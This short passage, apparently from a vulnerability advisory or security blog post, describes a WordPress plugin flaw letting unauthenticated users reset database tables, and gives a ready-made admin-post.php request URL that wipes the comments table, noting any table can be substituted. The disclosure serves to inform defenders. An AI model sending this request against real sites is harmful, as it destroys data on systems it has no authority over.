This flaw “allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state.”
URL/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111
Where you can set db-reset-tables%5B%5D to any database table you want to delete.